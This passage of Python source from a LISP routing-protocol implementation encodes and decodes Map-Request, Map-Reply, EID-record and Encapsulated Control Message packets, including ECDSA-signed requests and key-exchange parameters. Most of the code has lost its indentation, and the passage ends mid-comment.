if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (addr_str in lisp_crypto_keys_by_rloc_encap):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 4): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
        # If there is telemetry data in the JSON, we do not need to convert
        # it to a dict array.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
        # Get the AFI following the JSON string; we are expecting an AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
# Convert string to dictionary array.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if ("source-eid" not in json_string): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if ("signature-eid" not in json_string): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if ("signature" not in json_string): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == None): return(None)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (addr_str in rloc_keys): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (addr_str in lisp_crypto_keys_by_rloc_decap):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
        if (len(packet) < format_size): return(False)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
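#
# Illustrative sketch, not called by the protocol code: the byte-string
# that sign_map_request() and verify_map_request_sig() agree on. The
# ecdsa keypair, nonce, and EID strings are invented here; production
# keys come from the .pem files described above.
#
def _example_map_request_signature():
    import binascii

    privkey = ecdsa.SigningKey.generate()
    pubkey = privkey.get_verifying_key()

    sig_data = lisp_hex_string(0x1234) + "10.0.0.1" + "10.0.0.2"
    signature = privkey.sign(sig_data.encode())

    b64 = binascii.b2a_base64(signature)             # wire encoding
    return(pubkey.verify(binascii.a2b_base64(b64), sig_data.encode()))
#enddef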
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply(object):
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (self.nonce in lisp_crypto_keys_by_nonce):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
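#
# Illustrative sketch, not called by the protocol code: hop-count sits
# in bits 8-15 of the Map-Reply first long-word, below the three flag
# bits lisp_map_reply.encode() sets. Field values are invented.
#
def _example_map_reply_first_long():
    import socket
    import struct

    first_long = (LISP_MAP_REPLY << 28) | (7 << 8) | 2
    first_long |= 0x08000000                         # rloc-probe reply

    wire = struct.pack("I", socket.htonl(first_long))
    value = socket.ntohl(struct.unpack("I", wire)[0])

    assert ((value >> 8) & 0xff) == 7                # hop_count
    assert (value & 0xff) == 2                       # record_count
    assert bool(value & 0x08000000)                  # rloc_probe
#enddef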
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire set of locator records is encrypted with the
# chacha cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record(object):
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
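#
# Illustrative sketch, not called by the protocol code: Record-TTL is
# carried in minutes unless the high-order bit is set, in which case the
# low 31 bits are seconds, matching print_ttl() and store_ttl() above.
# The TTL values are invented.
#
def _example_eid_record_ttl():
    minutes_ttl = 1440                               # one day, in minutes
    assert (minutes_ttl & 0x80000000) == 0
    assert minutes_ttl * 60 == 86400                 # store_ttl() seconds

    seconds_ttl = 0x80000000 | 90                    # 90 seconds
    assert seconds_ttl & 0x80000000
    assert (seconds_ttl & 0x7fffffff) == 90          # store_ttl() seconds
#enddef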
#
# Encapsulated Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm(object):
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
#enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
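#
# Illustrative sketch, not called by the protocol code: lisp_ecm.decode()
# dispatches on the IP version nibble of the inner header. The two
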